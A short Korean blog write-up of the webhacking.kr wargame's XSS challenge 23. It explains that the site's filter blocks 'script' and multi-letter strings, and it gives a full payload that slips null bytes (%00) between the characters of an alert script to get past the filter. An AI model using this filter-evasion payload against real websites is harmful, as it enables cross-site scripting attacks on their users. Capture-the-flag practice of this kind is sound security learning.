webhacking.kr 23번 Write Up :) 끾

2019. 12. 19. 00:47웹해킹.kr

 

webhacking.kr 23번 Write Up :)

xss 문제.

script

 필터링당하고

wk 필터링이다.

일단 2글자 이상은 무조건 필터링

< , >는 안당한다.

ㅇㅅㅇ

 

 

 

 NULL값을 넣어주면. 

문자열의 끝으로 인식을해서 필터링을 우회한다고 한다.

%00

<%00s%00c%00r%00i%00p%00t%00>%00a%00l%00e%00r%00t%00(%00'%001%00'%00)%00;%00<%00/%00s%00c%00r%00i%00p%00t%00>%00

'웹해킹.kr' 카테고리의 다른 글

webhacking.kr 26번 Write Up :) 끾  (0) 2019.12.19
webhacking.kr 24번 Write Up :) 끾  (0) 2019.12.19
webhacking.kr 20번 Write Up :) 끾  (0) 2019.12.19
webhacking.kr 19번 Write Up :) 끾  (0) 2019.12.18
webhacking.kr 18번 Write Up :) 끾  (0) 2019.12.18